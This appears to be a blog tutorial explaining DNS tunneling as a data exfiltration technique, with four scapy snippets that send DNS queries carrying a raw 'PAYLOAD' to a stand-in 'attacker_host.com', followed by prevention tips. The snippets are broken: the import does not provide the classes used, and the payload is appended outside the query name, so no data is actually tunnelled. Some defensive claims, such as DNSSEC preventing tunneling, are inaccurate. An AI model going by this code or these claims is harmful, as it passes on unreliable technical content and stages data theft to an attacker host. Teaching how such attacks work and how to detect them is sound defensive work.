DNS Exfiltration via DNS Tunneling
Updated: Jan 25, 2023
Introduction
The emergence of the Internet has created a variety of essential tools and protocols to help facilitate operations. One such tool is the Domain Name System (DNS). DNS is one of the fundamental tools used to help facilitate communication within the Internet. Unfortunately, DNS can also be used to violate computer networks. DNS tunneling is a method of using DNS to exfiltrate data maliciously. This article explains how DNS tunneling works and provides examples of using A, CNAME, TXT, and MX DNS records with scapy in Python. It also describes how DNS can be used to bypass firewalls, and provides recommendations on how to prevent such attacks.
What is DNS Tunneling
DNS tunneling is a technique used by attackers to exfiltrate data from a target system. It hijacks the normal function of DNS, which is to map a domain name to an IP address, to instead smuggle data from the target network. It does this by sending data in the form of Domain Name System (DNS) requests containing malicious payloads, which are then exfiltrated back by the attacker.
DNS tunneling is usually used when direct exfiltration of data is not feasible due to a firewall in place. By passing data through DNS requests, attackers can circumvent these firewalls and exfiltrate data.
How does DNS Tunneling Work
DNS tunneling works by encoding data into a DNS query and its corresponding response from a DNS server. All systems connected to the Internet use DNS, making it a common and effective way to smuggle data past firewalls.
Basically, a malicious user will encode the data into a DNS query, which is then sent to a malicious server. The server responds with a DNS response which contains the decoded data. Therefore, attackers are able to send malicious data back and forth via DNS requests and responses.
Using A, CNAME, TXT, and MX DNS Records with scapy in Python
The most common type of DNS records used in DNS tunneling are A, CNAME, TXT, and MX records. All of these record types can be used with scapy in Python to send and receive payloads.
A Record
An A record is a DNS record that maps a domain name to an IP address. It is the most common data type used in DNS tunneling as it allows an attacker to send information by simply providing a hostname in an A record query.
The following code snippet shows a scapy packet with an A record query containing an arbitrary payload:
import scapy
from scapy import *
# create packet
packet = IP(dst="attacker_host.com")/\
UDP(dport=53)/\
DNS(rd=1,qd=DNSQR(qname="example.com",qtype="A"))/\
Raw(load="PAYLOAD")
# send packet
send(packet)CNAME Record
The CNAME record is another type of DNS record that can be used to send data using DNS tunneling. CNAME records are typically used to map one domain name to another; however, they can also be used to smuggle data.
The following code snippet shows a scapy packet with a CNAME record query containing an arbitrary payload:
import scapy
from scapy import *
# create packet
packet = IP(dst="attacker_host.com")/\
UDP(dport=53)/\
DNS(rd=1,qd=DNSQR(qname="example.com",qtype="CNAME"))/\
Raw(load="PAYLOAD")
# send packet
send(packet)TXT Record
The TXT record is a type of DNS record that can be used for domain verification and to store text-based data. Attackers can take advantage of this record type to smuggle data inside a DNS query.
The following code snippet shows a scapy packet with a TXT record query containing an arbitrary payload:
import scapy
from scapy import *
# create packet
packet = IP(dst="attacker_host.com")/\
UDP(dport=53)/\
DNS(rd=1,qd=DNSQR(qname="example.com",qtype="TXT"))/\
Raw(load="PAYLOAD")
# send packet
send(packet)MX Record
The MX record type is used to specify the mail exchange server for a domain. Attackers can use these records to smuggle data by including malicious data in the domain's mail exchange server.
The following code snippet shows a scapy packet with an MX record query containing an arbitrary payload:
import scapy
from scapy import *
# create packet
packet = IP(dst="127.0.0.1")/\
UDP(dport=53)/\
DNS(rd=1,qd=DNSQR(qname="example.com",qtype="MX"))/\
Raw(load="PAYLOAD")
# send packet
send(packet)How Can DNS Exfiltration Through DNS Tunneling Bypass Firewalls
Most firewalls are designed to inspect traffic and block malicious activity. However, they typically do not inspect DNS requests and responses, because they are generally assumed to be safe. As a result, attackers can use DNS tunneling to bypass firewalls, as the firewall will not block normal DNS requests.
Recommendations for Preventing DNS Tunneling
There are a variety of ways that organizations can take to prevent DNS tunneling. Some of these methods of prevention include:
• Enforcing DNS over TLS or DNSSEC: This will ensure that all DNS communication is encrypted and malicious attackers cannot modify or inject malicious requests into the DNS traffic.
• Whitelist DNS Servers: Prevent arbitrary DNS server assignment from endpoints. For example, if you typically use 8.8.8.8 for DNS resolution, only accept DNS requests destined for 8.8.8.8.
• Monitoring DNS logs: Organizations should monitor their DNS logs for suspicious activity, such as unusually large amounts of requests.
• Performing regular patching: Organizations should keep their systems up to date with the latest security patches to prevent attackers from exploiting known vulnerabilities.
Conclusion
The Domain Name System (DNS) is an essential tool for facilitating communication within the Internet. Unfortunately, it can also be abused for malicious purposes. This article has explained how attackers can use DNS tunneling to exfiltrate data from a target system, by encoding malicious data into DNS requests and responses. It has also provided examples of using A, CNAME, TXT, and MX DNS records with scapy in Python. Finally, it has described how DNS can be used to bypass firewalls, and provided recommendations for preventing such attacks.
Comments